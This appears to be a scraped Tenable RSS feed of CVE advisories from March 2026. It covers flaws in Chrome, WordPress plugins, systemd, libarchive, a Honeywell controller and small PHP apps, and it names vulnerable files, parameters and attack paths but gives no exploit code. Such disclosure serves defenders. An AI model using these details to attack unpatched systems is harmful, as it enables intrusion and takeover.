https://www.tenable.com/cve/feeds?sort=updated Get the latest CVE updates from Tenable Tue, 17 Mar 2026 11:07:44 GMT https://validator.w3.org/feed/docs/rss2.html Tenable CVEs https://www.tenable.com/themes/custom/tenable/img/favicons/apple-touch-icon.png https://www.tenable.com/cve/feeds?sort=updated Copyright 2026 Tenable, Inc. All rights reserved. https://www.tenable.com/cve/CVE-2026-3981 https://www.tenable.com/cve/CVE-2026-3981 Thu, 12 Mar 2026 05:16:14 GMT Medium Severity

Description

A vulnerability was found in itsourcecode Online Doctor Appointment System 1.0. Affected is an unknown function of the file /admin/doctor_action.php. Performing a manipulation of the argument ID results in sql injection. Remote exploitation of the attack is possible. The exploit has been made public and could be used.

Read more at https://www.tenable.com/cve/CVE-2026-3981

]]> https://www.tenable.com/cve/CVE-2026-3980 https://www.tenable.com/cve/CVE-2026-3980 Thu, 12 Mar 2026 05:16:13 GMT Medium Severity

Description

A vulnerability has been found in itsourcecode Online Doctor Appointment System 1.0. This impacts an unknown function of the file /admin/patient_action.php. Such manipulation of the argument patient_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.

Read more at https://www.tenable.com/cve/CVE-2026-3980

]]> https://www.tenable.com/cve/CVE-2026-3940 https://www.tenable.com/cve/CVE-2026-3940 Wed, 11 Mar 2026 22:16:36 GMT Medium Severity

Description

Insufficient policy enforcement in DevTools in Google Chrome prior to 146.0.7680.71 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Low)

Read more at https://www.tenable.com/cve/CVE-2026-3940

]]> https://www.tenable.com/cve/CVE-2026-3939 https://www.tenable.com/cve/CVE-2026-3939 Wed, 11 Mar 2026 22:16:36 GMT Medium Severity

Description

Insufficient policy enforcement in PDF in Google Chrome prior to 146.0.7680.71 allowed a remote attacker to bypass navigation restrictions via a crafted PDF file. (Chromium security severity: Low)

Read more at https://www.tenable.com/cve/CVE-2026-3939

]]> https://www.tenable.com/cve/CVE-2026-3934 https://www.tenable.com/cve/CVE-2026-3934 Wed, 11 Mar 2026 22:16:36 GMT Medium Severity

Description

Insufficient policy enforcement in ChromeDriver in Google Chrome prior to 146.0.7680.71 allowed a remote attacker to bypass same origin policy via a crafted HTML page. (Chromium security severity: Medium)

Read more at https://www.tenable.com/cve/CVE-2026-3934

]]> https://www.tenable.com/cve/CVE-2026-3932 https://www.tenable.com/cve/CVE-2026-3932 Wed, 11 Mar 2026 22:16:35 GMT High Severity

Description

Insufficient policy enforcement in PDF in Google Chrome on Android prior to 146.0.7680.71 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Medium)

Read more at https://www.tenable.com/cve/CVE-2026-3932

]]> https://www.tenable.com/cve/CVE-2026-3930 https://www.tenable.com/cve/CVE-2026-3930 Wed, 11 Mar 2026 22:16:35 GMT Medium Severity

Description

Unsafe navigation in Navigation in Google Chrome on iOS prior to 146.0.7680.71 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Medium)

Read more at https://www.tenable.com/cve/CVE-2026-3930

]]> https://www.tenable.com/cve/CVE-2026-28509 https://www.tenable.com/cve/CVE-2026-28509 Fri, 06 Mar 2026 05:16:35 GMT Medium Severity

Description

LangBot is a global IM bot platform designed for LLMs. Prior to version 4.8.7, LangBot’s web UI renders user-supplied raw HTML using rehypeRaw, which can lead to a cross-site scripting (XSS) vulnerability. This issue has been patched in version 4.8.7.

Read more at https://www.tenable.com/cve/CVE-2026-28509

]]> https://www.tenable.com/cve/CVE-2025-54236 https://www.tenable.com/cve/CVE-2025-54236 Tue, 09 Sep 2025 14:15:46 GMT Critical Severity

Description

Adobe Commerce versions 2.4.9-alpha2, 2.4.8-p2, 2.4.7-p7, 2.4.6-p12, 2.4.5-p14, 2.4.4-p15 and earlier are affected by an Improper Input Validation vulnerability. A successful attacker can abuse this to achieve session takeover, increasing the confidentiality, and integrity impact to high. Exploitation of this issue does not require user interaction.

Read more at https://www.tenable.com/cve/CVE-2025-54236

]]> https://www.tenable.com/cve/CVE-2026-4111 https://www.tenable.com/cve/CVE-2026-4111 Fri, 13 Mar 2026 19:55:13 GMT High Severity

Description

A flaw was identified in the RAR5 archive decompression logic of the libarchive library, specifically within the archive_read_data() processing path. When a specially crafted RAR5 archive is processed, the decompression routine may enter a state where internal logic prevents forward progress. This condition results in an infinite loop that continuously consumes CPU resources. Because the archive passes checksum validation and appears structurally valid, affected applications cannot detect the issue before processing. This can allow attackers to cause persistent denial-of-service conditions in services that automatically process archives.

Read more at https://www.tenable.com/cve/CVE-2026-4111

]]> https://www.tenable.com/cve/CVE-2026-4105 https://www.tenable.com/cve/CVE-2026-4105 Fri, 13 Mar 2026 19:55:13 GMT High Severity

Description

A flaw was found in systemd. The systemd-machined service contains an Improper Access Control vulnerability due to insufficient validation of the class parameter in the RegisterMachine D-Bus (Desktop Bus) method. A local unprivileged user can exploit this by attempting to register a machine with a specific class value, which may leave behind a usable, attacker-controlled machine object. This allows the attacker to invoke methods on the privileged object, leading to the execution of arbitrary commands with root privileges on the host system.

Read more at https://www.tenable.com/cve/CVE-2026-4105

]]> https://www.tenable.com/cve/CVE-2026-4092 https://www.tenable.com/cve/CVE-2026-4092 Fri, 13 Mar 2026 19:55:13 GMT High Severity

Description

Path Traversal in Clasp impacting versions < 3.2.0 allows a remote attacker to perform remote code execution via a malicious Google Apps Script project containing specially crafted filenames with directory traversal sequences.

Read more at https://www.tenable.com/cve/CVE-2026-4092

]]> https://www.tenable.com/cve/CVE-2026-4063 https://www.tenable.com/cve/CVE-2026-4063 Fri, 13 Mar 2026 19:55:13 GMT Medium Severity

Description

The Social Icons Widget & Block by WPZOOM plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check in the add_menu_item() method hooked to admin_menu in all versions up to, and including, 4.5.8. This is due to the method performing wp_insert_post() and update_post_meta() calls to create a sharing configuration without verifying the current user has administrator-level capabilities. This makes it possible for authenticated attackers, with Subscriber-level access and above, to trigger the creation of a published wpzoom-sharing configuration post with default sharing button settings, which causes social sharing buttons to be automatically injected into all post content on the frontend via the the_content filter.

Read more at https://www.tenable.com/cve/CVE-2026-4063

]]> https://www.tenable.com/cve/CVE-2026-4014 https://www.tenable.com/cve/CVE-2026-4014 Thu, 12 Mar 2026 08:16:12 GMT Medium Severity

Description

A security flaw has been discovered in itsourcecode Cafe Reservation System 1.0. This impacts an unknown function of the file /curvus2/signup.php of the component Registration. Performing a manipulation of the argument Username results in sql injection. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks.

Read more at https://www.tenable.com/cve/CVE-2026-4014

]]> https://www.tenable.com/cve/CVE-2026-3999 https://www.tenable.com/cve/CVE-2026-3999 Fri, 13 Mar 2026 19:55:13 GMT High Severity

Description

A broken access control may allow an authenticated user to perform a horizontal privilege escalation. The vulnerability only impacts specific configurations.

Read more at https://www.tenable.com/cve/CVE-2026-3999

]]> https://www.tenable.com/cve/CVE-2026-3986 https://www.tenable.com/cve/CVE-2026-3986 Fri, 13 Mar 2026 19:55:12 GMT Medium Severity

Description

The Calculated Fields Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the form settings in all versions up to, and including, 5.4.5.0. This is due to insufficient capability checks on the form settings save handler and insufficient input sanitization of the `fcontent` field in `fhtml` field types. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

Read more at https://www.tenable.com/cve/CVE-2026-3986

]]> https://www.tenable.com/cve/CVE-2026-3942 https://www.tenable.com/cve/CVE-2026-3942 Wed, 11 Mar 2026 22:16:36 GMT Medium Severity

Description

Incorrect security UI in PictureInPicture in Google Chrome prior to 146.0.7680.71 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low)

Read more at https://www.tenable.com/cve/CVE-2026-3942

]]> https://www.tenable.com/cve/CVE-2026-3941 https://www.tenable.com/cve/CVE-2026-3941 Wed, 11 Mar 2026 22:16:36 GMT Medium Severity

Description

Insufficient policy enforcement in DevTools in Google Chrome prior to 146.0.7680.71 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Low)

Read more at https://www.tenable.com/cve/CVE-2026-3941

]]> https://www.tenable.com/cve/CVE-2026-3936 https://www.tenable.com/cve/CVE-2026-3936 Wed, 11 Mar 2026 22:16:36 GMT High Severity

Description

Use after free in WebView in Google Chrome on Android prior to 146.0.7680.71 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)

Read more at https://www.tenable.com/cve/CVE-2026-3936

]]> https://www.tenable.com/cve/CVE-2026-3931 https://www.tenable.com/cve/CVE-2026-3931 Wed, 11 Mar 2026 22:16:35 GMT High Severity

Description

Heap buffer overflow in Skia in Google Chrome prior to 146.0.7680.71 allowed a remote attacker to perform out of bounds memory access via a crafted HTML page. (Chromium security severity: Medium)

Read more at https://www.tenable.com/cve/CVE-2026-3931

]]> https://www.tenable.com/cve/CVE-2026-3929 https://www.tenable.com/cve/CVE-2026-3929 Wed, 11 Mar 2026 22:16:35 GMT Low Severity

Description

Side-channel information leakage in ResourceTiming in Google Chrome prior to 146.0.7680.71 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium)

Read more at https://www.tenable.com/cve/CVE-2026-3929

]]> https://www.tenable.com/cve/CVE-2026-3927 https://www.tenable.com/cve/CVE-2026-3927 Wed, 11 Mar 2026 22:16:35 GMT Medium Severity

Description

Incorrect security UI in PictureInPicture in Google Chrome prior to 146.0.7680.71 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium)

Read more at https://www.tenable.com/cve/CVE-2026-3927

]]> https://www.tenable.com/cve/CVE-2026-3926 https://www.tenable.com/cve/CVE-2026-3926 Wed, 11 Mar 2026 22:16:35 GMT High Severity

Description

Out of bounds read in V8 in Google Chrome prior to 146.0.7680.71 allowed a remote attacker to perform out of bounds memory access via a crafted HTML page. (Chromium security severity: Medium)

Read more at https://www.tenable.com/cve/CVE-2026-3926

]]> https://www.tenable.com/cve/CVE-2026-3925 https://www.tenable.com/cve/CVE-2026-3925 Wed, 11 Mar 2026 22:16:35 GMT Medium Severity

Description

Incorrect security UI in LookalikeChecks in Google Chrome on Android prior to 146.0.7680.71 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium)

Read more at https://www.tenable.com/cve/CVE-2026-3925

]]> https://www.tenable.com/cve/CVE-2026-3924 https://www.tenable.com/cve/CVE-2026-3924 Wed, 11 Mar 2026 22:16:34 GMT High Severity

Description

use after free in WindowDialog in Google Chrome prior to 146.0.7680.71 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)

Read more at https://www.tenable.com/cve/CVE-2026-3924

]]> https://www.tenable.com/cve/CVE-2026-3923 https://www.tenable.com/cve/CVE-2026-3923 Wed, 11 Mar 2026 22:16:34 GMT High Severity

Description

Use after free in WebMIDI in Google Chrome prior to 146.0.7680.71 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

Read more at https://www.tenable.com/cve/CVE-2026-3923

]]> https://www.tenable.com/cve/CVE-2026-3922 https://www.tenable.com/cve/CVE-2026-3922 Wed, 11 Mar 2026 22:16:34 GMT High Severity

Description

Use after free in MediaStream in Google Chrome prior to 146.0.7680.71 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

Read more at https://www.tenable.com/cve/CVE-2026-3922

]]> https://www.tenable.com/cve/CVE-2026-3921 https://www.tenable.com/cve/CVE-2026-3921 Wed, 11 Mar 2026 22:16:34 GMT High Severity

Description

Use after free in TextEncoding in Google Chrome prior to 146.0.7680.71 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

Read more at https://www.tenable.com/cve/CVE-2026-3921

]]> https://www.tenable.com/cve/CVE-2026-3920 https://www.tenable.com/cve/CVE-2026-3920 Wed, 11 Mar 2026 22:16:34 GMT High Severity

Description

Out of bounds memory access in WebML in Google Chrome prior to 146.0.7680.71 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

Read more at https://www.tenable.com/cve/CVE-2026-3920

]]> https://www.tenable.com/cve/CVE-2026-3919 https://www.tenable.com/cve/CVE-2026-3919 Wed, 11 Mar 2026 22:16:34 GMT High Severity

Description

Use after free in Extensions in Google Chrome prior to 146.0.7680.71 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

Read more at https://www.tenable.com/cve/CVE-2026-3919

]]> https://www.tenable.com/cve/CVE-2026-3918 https://www.tenable.com/cve/CVE-2026-3918 Wed, 11 Mar 2026 22:16:34 GMT High Severity

Description

Use after free in WebMCP in Google Chrome prior to 146.0.7680.71 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

Read more at https://www.tenable.com/cve/CVE-2026-3918

]]> https://www.tenable.com/cve/CVE-2026-3917 https://www.tenable.com/cve/CVE-2026-3917 Wed, 11 Mar 2026 22:16:34 GMT High Severity

Description

Use after free in Agents in Google Chrome prior to 146.0.7680.71 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

Read more at https://www.tenable.com/cve/CVE-2026-3917

]]> https://www.tenable.com/cve/CVE-2026-3916 https://www.tenable.com/cve/CVE-2026-3916 Wed, 11 Mar 2026 22:16:33 GMT Critical Severity

Description

Out of bounds read in Web Speech in Google Chrome prior to 146.0.7680.71 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)

Read more at https://www.tenable.com/cve/CVE-2026-3916

]]> https://www.tenable.com/cve/CVE-2026-3915 https://www.tenable.com/cve/CVE-2026-3915 Wed, 11 Mar 2026 22:16:33 GMT High Severity

Description

Heap buffer overflow in WebML in Google Chrome prior to 146.0.7680.71 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: High)

Read more at https://www.tenable.com/cve/CVE-2026-3915

]]> https://www.tenable.com/cve/CVE-2026-3914 https://www.tenable.com/cve/CVE-2026-3914 Wed, 11 Mar 2026 22:16:33 GMT High Severity

Description

Integer overflow in WebML in Google Chrome prior to 146.0.7680.71 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

Read more at https://www.tenable.com/cve/CVE-2026-3914

]]> https://www.tenable.com/cve/CVE-2026-3913 https://www.tenable.com/cve/CVE-2026-3913 Wed, 11 Mar 2026 22:16:33 GMT High Severity

Description

Heap buffer overflow in WebML in Google Chrome prior to 146.0.7680.71 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Critical)

Read more at https://www.tenable.com/cve/CVE-2026-3913

]]> https://www.tenable.com/cve/CVE-2026-3910 https://www.tenable.com/cve/CVE-2026-3910 Fri, 13 Mar 2026 19:55:11 GMT High Severity

Description

Inappropriate implementation in V8 in Google Chrome prior to 146.0.7680.75 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)

Read more at https://www.tenable.com/cve/CVE-2026-3910

]]> https://www.tenable.com/cve/CVE-2026-3909 https://www.tenable.com/cve/CVE-2026-3909 Fri, 13 Mar 2026 19:55:11 GMT High Severity

Description

Out of bounds write in Skia in Google Chrome prior to 146.0.7680.75 allowed a remote attacker to perform out of bounds memory access via a crafted HTML page. (Chromium security severity: High)

Read more at https://www.tenable.com/cve/CVE-2026-3909

]]> https://www.tenable.com/cve/CVE-2026-3891 https://www.tenable.com/cve/CVE-2026-3891 Fri, 13 Mar 2026 19:55:10 GMT Critical Severity

Description

The Pix for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing capability check and missing file type validation in the 'lkn_pix_for_woocommerce_c6_save_settings' function in all versions up to, and including, 1.5.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.

Read more at https://www.tenable.com/cve/CVE-2026-3891

]]> https://www.tenable.com/cve/CVE-2026-3873 https://www.tenable.com/cve/CVE-2026-3873 Fri, 13 Mar 2026 19:55:10 GMT High Severity

Description

Use of Hard-coded Credentials vulnerability in Avantra allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Avantra: before 25.3.0.

Read more at https://www.tenable.com/cve/CVE-2026-3873

]]> https://www.tenable.com/cve/CVE-2026-3798 https://www.tenable.com/cve/CVE-2026-3798 Mon, 09 Mar 2026 04:16:02 GMT Medium Severity

Description

A vulnerability was detected in Comfast CF-AC100 2.6.0.8. This affects the function sub_44AC14 of the file /cgi-bin/mbox-config?method=SET§ion=ping_config of the component Request Path Handler. The manipulation results in command injection. The attack may be launched remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

Read more at https://www.tenable.com/cve/CVE-2026-3798

]]> https://www.tenable.com/cve/CVE-2026-3725 https://www.tenable.com/cve/CVE-2026-3725 Sun, 08 Mar 2026 09:16:18 GMT Medium Severity

Description

A flaw has been found in 1024-lab/lab1024 SmartAdmin up to 3.29. Affected by this issue is the function freemarkerResolverContent of the file sa-base/src/main/java/net/lab1024/sa/base/module/support/mail/MailService.java of the component FreeMarker Template Handler. Executing a manipulation of the argument template_content can lead to improper neutralization of special elements used in a template engine. The attack can be launched remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

Read more at https://www.tenable.com/cve/CVE-2026-3725

]]> https://www.tenable.com/cve/CVE-2026-3721 https://www.tenable.com/cve/CVE-2026-3721 Sun, 08 Mar 2026 08:16:00 GMT Medium Severity

Description

A weakness has been identified in 1024-lab/lab1024 SmartAdmin up to 3.29. The affected element is an unknown function of the file sa-base/src/main/java/net/lab1024/sa/base/module/support/helpdoc/domain/form/HelpDocAddForm.java of the component Help Documentation Module. This manipulation causes cross site scripting. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.

Read more at https://www.tenable.com/cve/CVE-2026-3721

]]> https://www.tenable.com/cve/CVE-2026-3720 https://www.tenable.com/cve/CVE-2026-3720 Sun, 08 Mar 2026 08:15:59 GMT Medium Severity

Description

A security flaw has been discovered in 1024-lab/lab1024 SmartAdmin up to 3.29. Impacted is an unknown function of the file smart-admin-web-javascript/src/views/business/oa/notice/components/notice-form-drawer.vue of the component Notice Module. The manipulation results in cross site scripting. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.

Read more at https://www.tenable.com/cve/CVE-2026-3720

]]> https://www.tenable.com/cve/CVE-2026-3611 https://www.tenable.com/cve/CVE-2026-3611 Thu, 12 Mar 2026 21:16:27 GMT Critical Severity

Description

The Honeywell IQ4x building management controller, exposes its full web-based HMI without authentication in its factory-default configuration. With no user module configured, security is disabled by design and the system operates under a System Guest (level 100) context, granting read/write privileges to any party able to reach the HTTP interface. Authentication controls are only enforced after a web user is created via U.htm, which dynamically enables the user module. Because this function is accessible prior to authentication, a remote user can create a new account with administrative read/write permissions enabling the user module and imposing authentication under attacker-controlled credentials. This action can effectively lock legitimate operators out of local and web-based configuration and administration.

Read more at https://www.tenable.com/cve/CVE-2026-3611

]]> https://www.tenable.com/cve/CVE-2026-3455 https://www.tenable.com/cve/CVE-2026-3455 Tue, 03 Mar 2026 05:17:25 GMT Medium Severity

Description

Versions of the package mailparser before 3.9.3 are vulnerable to Cross-site Scripting (XSS) via the textToHtml() function due to the improper sanitisation of URLs in the email content. An attacker can execute arbitrary scripts in victim browsers by adding extra quote " to the URL with embedded malicious JavaScript code.

Read more at https://www.tenable.com/cve/CVE-2026-3455

]]> https://www.tenable.com/cve/CVE-2026-3393 https://www.tenable.com/cve/CVE-2026-3393 Sun, 01 Mar 2026 13:16:14 GMT Medium Severity

Description

A security vulnerability has been detected in jarikomppa soloud up to 20200207. The impacted element is the function SoLoud::Wav::loadflac of the file src/audiosource/wav/soloud_wav.cpp of the component Audio File Handler. Such manipulation leads to heap-based buffer overflow. The attack must be carried out locally. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.

Read more at https://www.tenable.com/cve/CVE-2026-3393

]]> https://www.tenable.com/cve/CVE-2026-32746 https://www.tenable.com/cve/CVE-2026-32746 Fri, 13 Mar 2026 19:55:10 GMT Critical Severity

Description

telnetd in GNU inetutils through 2.7 allows an out-of-bounds write in the LINEMODE SLC (Set Local Characters) suboption handler because add_slc does not check whether the buffer is full.

Read more at https://www.tenable.com/cve/CVE-2026-32746

]]> https://www.tenable.com/cve/CVE-2026-32745 https://www.tenable.com/cve/CVE-2026-32745 Fri, 13 Mar 2026 19:55:09 GMT Medium Severity

Description

In JetBrains Datalore before 2026.1 session hijacking was possible due to missing secure attribute for cookie settings

Read more at https://www.tenable.com/cve/CVE-2026-32745

]]> https://www.tenable.com/cve/CVE-2026-32612 https://www.tenable.com/cve/CVE-2026-32612 Fri, 13 Mar 2026 19:55:09 GMT Medium Severity

Description

Statamic is a Laravel and Git powered content management system (CMS). Prior to 6.6.2, stored XSS in the control panel color mode preference allows authenticated users with control panel access to inject malicious JavaScript that executes when a higher-privileged user impersonates their account. This has been fixed in 6.6.2.

Read more at https://www.tenable.com/cve/CVE-2026-32612

]]> https://www.tenable.com/cve/CVE-2026-32598 https://www.tenable.com/cve/CVE-2026-32598 Fri, 13 Mar 2026 19:55:09 GMT Medium Severity

Description

OneUptime is a solution for monitoring and managing online services. Prior to 10.0.24, the password reset flow logs the complete password reset URL — containing the plaintext reset token — at INFO log level, which is enabled by default in production. Anyone with access to application logs (log aggregation, Docker logs, Kubernetes pod logs) can intercept reset tokens and perform account takeover on any user. This vulnerability is fixed in 10.0.24.

Read more at https://www.tenable.com/cve/CVE-2026-32598

]]> https://www.tenable.com/cve/CVE-2026-32597 https://www.tenable.com/cve/CVE-2026-32597 Fri, 13 Mar 2026 19:55:09 GMT High Severity

Description

PyJWT is a JSON Web Token implementation in Python. Prior to 2.12.0, PyJWT does not validate the crit (Critical) Header Parameter defined in RFC 7515 §4.1.11. When a JWS token contains a crit array listing extensions that PyJWT does not understand, the library accepts the token instead of rejecting it. This violates the MUST requirement in the RFC. This vulnerability is fixed in 2.12.0.

Read more at https://www.tenable.com/cve/CVE-2026-32597

]]> https://www.tenable.com/cve/CVE-2026-32543 https://www.tenable.com/cve/CVE-2026-32543 Fri, 13 Mar 2026 19:55:09 GMT Medium Severity

Description

Missing Authorization vulnerability in CyberChimps Responsive Blocks responsive-block-editor-addons allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Responsive Blocks: from n/a through <= 2.2.0.

Read more at https://www.tenable.com/cve/CVE-2026-32543

]]> https://www.tenable.com/cve/CVE-2026-32487 https://www.tenable.com/cve/CVE-2026-32487 Fri, 13 Mar 2026 19:55:09 GMT Medium Severity

Description

Missing Authorization vulnerability in raratheme Lawyer Landing Page lawyer-landing-page allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Lawyer Landing Page: from n/a through <= 1.2.7.

Read more at https://www.tenable.com/cve/CVE-2026-32487

]]> https://www.tenable.com/cve/CVE-2026-32486 https://www.tenable.com/cve/CVE-2026-32486 Fri, 13 Mar 2026 19:55:08 GMT Medium Severity

Description

Missing Authorization vulnerability in wptravelengine Travel Booking travel-booking allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Travel Booking: from n/a through <= 1.3.9.

Read more at https://www.tenable.com/cve/CVE-2026-32486

]]> https://www.tenable.com/cve/CVE-2026-32462 https://www.tenable.com/cve/CVE-2026-32462 Fri, 13 Mar 2026 19:55:08 GMT Medium Severity

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Liton Arefin Master Addons for Elementor master-addons allows DOM-Based XSS.This issue affects Master Addons for Elementor: from n/a through <= 2.1.3.

Read more at https://www.tenable.com/cve/CVE-2026-32462

]]> https://www.tenable.com/cve/CVE-2026-32461 https://www.tenable.com/cve/CVE-2026-32461 Fri, 13 Mar 2026 19:55:08 GMT Medium Severity

Description

Missing Authorization vulnerability in Really Simple Plugins Really Simple SSL really-simple-ssl allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Really Simple SSL: from n/a through <= 9.5.7.

Read more at https://www.tenable.com/cve/CVE-2026-32461

]]> https://www.tenable.com/cve/CVE-2026-32460 https://www.tenable.com/cve/CVE-2026-32460 Fri, 13 Mar 2026 19:55:08 GMT Medium Severity

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themefic Ultimate Addons for Contact Form 7 ultimate-addons-for-contact-form-7 allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Ultimate Addons for Contact Form 7: from n/a through <= 3.5.36.

Read more at https://www.tenable.com/cve/CVE-2026-32460

]]> https://www.tenable.com/cve/CVE-2026-32459 https://www.tenable.com/cve/CVE-2026-32459 Fri, 13 Mar 2026 19:55:08 GMT High Severity

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in flycart UpsellWP checkout-upsell-and-order-bumps allows Blind SQL Injection.This issue affects UpsellWP: from n/a through <= 2.2.4.

Read more at https://www.tenable.com/cve/CVE-2026-32459

]]> https://www.tenable.com/cve/CVE-2026-32458 https://www.tenable.com/cve/CVE-2026-32458 Fri, 13 Mar 2026 19:55:08 GMT High Severity

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in RealMag777 WOLF bulk-editor allows Blind SQL Injection.This issue affects WOLF: from n/a through <= 1.0.8.7.

Read more at https://www.tenable.com/cve/CVE-2026-32458

]]> https://www.tenable.com/cve/CVE-2026-32457 https://www.tenable.com/cve/CVE-2026-32457 Fri, 13 Mar 2026 19:55:07 GMT Medium Severity

Description

Missing Authorization vulnerability in Wombat Plugins Advanced Product Fields (Product Addons) for WooCommerce advanced-product-fields-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Advanced Product Fields (Product Addons) for WooCommerce: from n/a through <= 1.6.18.

Read more at https://www.tenable.com/cve/CVE-2026-32457

]]> https://www.tenable.com/cve/CVE-2026-32456 https://www.tenable.com/cve/CVE-2026-32456 Fri, 13 Mar 2026 19:55:07 GMT Medium Severity

Description

Cross-Site Request Forgery (CSRF) vulnerability in Janis Elsts Admin Menu Editor admin-menu-editor allows Cross Site Request Forgery.This issue affects Admin Menu Editor: from n/a through <= 1.14.1.

Read more at https://www.tenable.com/cve/CVE-2026-32456

]]> https://www.tenable.com/cve/CVE-2026-32455 https://www.tenable.com/cve/CVE-2026-32455 Fri, 13 Mar 2026 19:55:07 GMT Medium Severity

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RealMag777 MDTF wp-meta-data-filter-and-taxonomy-filter allows DOM-Based XSS.This issue affects MDTF: from n/a through <= 1.3.5.

Read more at https://www.tenable.com/cve/CVE-2026-32455

]]> https://www.tenable.com/cve/CVE-2026-32454 https://www.tenable.com/cve/CVE-2026-32454 Fri, 13 Mar 2026 19:55:07 GMT Medium Severity

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeFusion Avada Core fusion-core allows DOM-Based XSS.This issue affects Avada Core: from n/a through < 5.15.0.

Read more at https://www.tenable.com/cve/CVE-2026-32454

]]> https://www.tenable.com/cve/CVE-2026-32453 https://www.tenable.com/cve/CVE-2026-32453 Fri, 13 Mar 2026 19:55:06 GMT Medium Severity

Description

Missing Authorization vulnerability in ThemeFusion Avada Core fusion-core allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Avada Core: from n/a through < 5.15.0.

Read more at https://www.tenable.com/cve/CVE-2026-32453

]]> https://www.tenable.com/cve/CVE-2026-32452 https://www.tenable.com/cve/CVE-2026-32452 Fri, 13 Mar 2026 19:55:06 GMT Medium Severity

Description

Missing Authorization vulnerability in ThemeFusion Fusion Builder fusion-builder allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Fusion Builder: from n/a through < 3.15.0.

Read more at https://www.tenable.com/cve/CVE-2026-32452

]]> https://www.tenable.com/cve/CVE-2026-32451 https://www.tenable.com/cve/CVE-2026-32451 Fri, 13 Mar 2026 19:55:06 GMT Medium Severity

Description

Missing Authorization vulnerability in ThemeFusion Fusion Builder fusion-builder allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Fusion Builder: from n/a through < 3.15.0.

Read more at https://www.tenable.com/cve/CVE-2026-32451

]]> https://www.tenable.com/cve/CVE-2026-32450 https://www.tenable.com/cve/CVE-2026-32450 Fri, 13 Mar 2026 19:55:06 GMT Medium Severity

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RealMag777 Active Products Tables for WooCommerce profit-products-tables-for-woocommerce allows DOM-Based XSS.This issue affects Active Products Tables for WooCommerce: from n/a through <= 1.0.7.

Read more at https://www.tenable.com/cve/CVE-2026-32450

]]> https://www.tenable.com/cve/CVE-2026-32449 https://www.tenable.com/cve/CVE-2026-32449 Fri, 13 Mar 2026 19:55:05 GMT Medium Severity

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in themifyme Themify Event Post themify-event-post allows Stored XSS.This issue affects Themify Event Post: from n/a through <= 1.3.4.

Read more at https://www.tenable.com/cve/CVE-2026-32449

]]> https://www.tenable.com/cve/CVE-2026-32448 https://www.tenable.com/cve/CVE-2026-32448 Fri, 13 Mar 2026 19:55:05 GMT Medium Severity

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Eric Teubert Podlove Podcast Publisher podlove-podcasting-plugin-for-wordpress allows Stored XSS.This issue affects Podlove Podcast Publisher: from n/a through <= 4.3.3.

Read more at https://www.tenable.com/cve/CVE-2026-32448

